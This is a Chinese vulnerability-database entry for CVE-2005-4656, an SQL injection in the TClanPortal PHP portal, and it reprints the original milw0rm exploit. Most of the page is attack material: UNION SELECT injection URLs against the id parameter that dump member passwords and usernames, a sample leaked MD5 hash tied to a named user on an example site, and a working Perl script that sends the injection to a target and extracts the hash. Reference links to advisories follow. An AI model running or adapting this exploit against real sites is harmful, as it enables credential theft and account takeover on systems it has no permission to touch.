TriggerTG TClanPortal Index.PHP SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1109173 漏洞类型 SQL注入
发布时间 2005-10-26 更新时间 2006-01-17
CVE编号 CVE-2005-4656 CNNVD-ID CNNVD-200512-898
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1273
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-898
|漏洞详情
TClanPortal1.1.3及更早版本的index.php存在SQL注入漏洞,远程攻击者可以通过id参数来执行任意SQL命令并获取所有用户名和密码。
|漏洞EXP
# TClanPortal Version 3 ..
# Search By Google :-
# by TriggerTG.de 2003 - Version 3
#
# Gr33tz :-
#         Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-
#         Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -
#         Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P
#         HACKERS PAL ..
#         Yes2Hack ..
#         WwW.Sqor.NeT
#         WwW.S4a.Cc
#         WwW.SecurityGurus.NeT
#
#
#
# This Injection's Whene Prefix = "";
#
# 1- SQL Injection
# /ClanPortal/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=1/*
# http://yahzee.ya.funpic.de/ClanPortal/
#
# Richard
# d38b89019f0496a4e67bfbe95cbcba0f    - MD5
#
# 2- SQL Injection
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20pw,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Password
#
#
# /linkdl/index.php?action=bewerten&id=-1%20UNION%20SELECT%20name,null,null%20FROM%20member%20%20WHERE%20id=1/*
# [!] GET Username
#
# [!] Perl Code By Devil-00 | devil-00@s4a.cc |
#------------------------------------------------------------------------------------------------------------

use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for TClanPortal Version 3            ";
print "\n= Coded By Devil-00 | devil-00@s4a.cc |        ";
print "\n= Gr33tz :-                                                            ";
print "\n= Abducter .. SQL Injection's FOunder   - | abducter_minds76@hotmail.com |-            ";
print "\n= Devil-00 .. SQL Injection's Exploting - | devil-00@s4a.cc | -        ";
print "\n= Security4Arab .. A'Where Home .. WE LOVE S4A FOR EVER :P             ";
print "\n= HACKERS PAL ..                                                       ";
print "\n= Yes2Hack ..                                                          ";
print "\n= WwW.Sqor.NeT                                                         ";
print "\n= WwW.S4a.Cc                                                           ";
print "\n= WwW.SecurityGurus.NeT                                        ";
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
  print "Usage:\nperl $0 [Full-Path] [SQL Prefix] [User ID]\n\nExample:\nperl $0 http://yahzee.ya.funpic.de/ClanPortal/ 1\n";
  exit(0);
}
$url = "/linkdl/index.php?action=relatedlink&id=-1%20UNION%20SELECT%20pw,name,null,name,name,name%20FROM%20member%20%20WHERE%20id=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<a href='(.*?)' target='_parent'>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<b>Name:<\/b> <a href='index\.php\?action=kat&id=0'>(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-10-26]
|参考资料

来源:XF
名称:tclanportal-index-sql-injection(22869)
链接:http://xforce.iss.net/xforce/xfdb/22869
来源:BID
名称:15173
链接:http://www.securityfocus.com/bid/15173
来源:VUPEN
名称:ADV-2005-2187
链接:http://www.frsirt.com/english/advisories/2005/2187
来源:SECUNIA
名称:17324
链接:http://secunia.com/advisories/17324
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/TClanPortal_sql_inj.pl
来源:OSVDB
名称:20305
链接:http://www.osvdb.org/20305